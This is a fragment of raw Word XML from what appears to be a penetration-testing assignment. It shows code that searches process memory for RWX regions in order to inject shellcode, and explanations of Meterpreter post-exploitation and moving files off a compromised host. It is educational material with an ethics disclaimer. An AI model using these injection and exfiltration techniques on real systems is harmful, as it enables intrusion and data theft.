          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BaseAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RegionSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="2" w:color="888888"/>
          <w:left w:val="single" w:sz="6" w:space="2" w:color="888888"/>
          <w:bottom w:val="single" w:sz="6" w:space="2" w:color="888888"/>
          <w:right w:val="single" w:sz="6" w:space="2" w:color="888888"/>
        </w:pBdr>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">address </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MaxAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>This implementation is pretty much straight forward for what we want to achieve. A processes private virtual memory space (the user land virtual memory space) is searched for a memory s</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>ection that is marked with PAGE_EXECUTE_READWRITE, which again maps to 0x40 as seen in previous examples. If that space is found it is returned, if not the next search address is set the next memory region (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>BaseAddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> + Memory Region).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">To complete this into code execution your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> needs then to be moved to that found memory region and executed. An easy way to do this would to fall back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> calls as shown in the first technique, but the CONs of that approach should be considered as stated above. At the end of this post I’ll share usable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>PoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> for references of how t</w:t>
      </w:r>
      <w:r w:rsidR="00F07469" w:rsidRPr="00F07469">
        <w:t xml:space="preserve">his could be implemented. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">To finally execute the placed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> (Step 3.)</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B5BC7" w:rsidRPr="00F07469">
        <w:t>ROP-gadgets might become useful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00066ED9" w:rsidRPr="00F07469" w:rsidRDefault="006B5BC7" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidR="00F07469" w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>3:-</w:t>
      </w:r>
      <w:r w:rsidR="00066ED9" w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Get a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00066ED9" w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00066ED9" w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B5BC7" w:rsidRPr="00F07469" w:rsidRDefault="006B5BC7" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework, is a post-exploitation tool that features command history, tab completion, scripting and much more. It is a dynamically extensible payload that can be extended over the network at </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>runtime. The tool is based on the principle of 'In-memory DLL injection', which makes the target system run the injected DLL by creating a new process that calls the injected DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED43A8" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00066ED9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Q4:-</w:t>
      </w:r>
      <w:r w:rsidR="00066ED9" w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upload and Download few files from the exploited system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Imagine you have compromised a target system as part of a Penetration test. Additionally, as part of the pen-test you need to download some files, both as proof of the compromise, and also to use the collected data from this system to assist in further exploitation of other systems.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Here I discuss options for how files can be downloaded using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>console,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> scripts to speed up the process.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>I must emphasize that these techniques should only be used for legitimate purposes, either on a test network, or for penetration testing where you have written permission from the data owner.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>You are heir to your actions, make sure that everything you do is ethical, and use these techniques for good purposes.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>We will skip the exploitation phase in these examples, to focus on the post-exploitation and data collection aspects.</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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we have exploited a system, and find ourselves at friendly </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> console prompt.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5835E8B9" wp14:editId="272DE1A4">
            <wp:extent cx="3810000" cy="571500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="http://1.bp.blogspot.com/_2IvFH57W8Hc/TMiADkAI3fI/AAAAAAAAADI/fJW46dQPQTQ/s400/exploit.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bp.blogspot.com/_2IvFH57W8Hc/TMiADkAI3fI/AAAAAAAAADI/fJW46dQPQTQ/s400/exploit.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571500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07469" w:rsidRPr="00F07469" w:rsidRDefault="00F07469" w:rsidP="00F07469">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pP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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
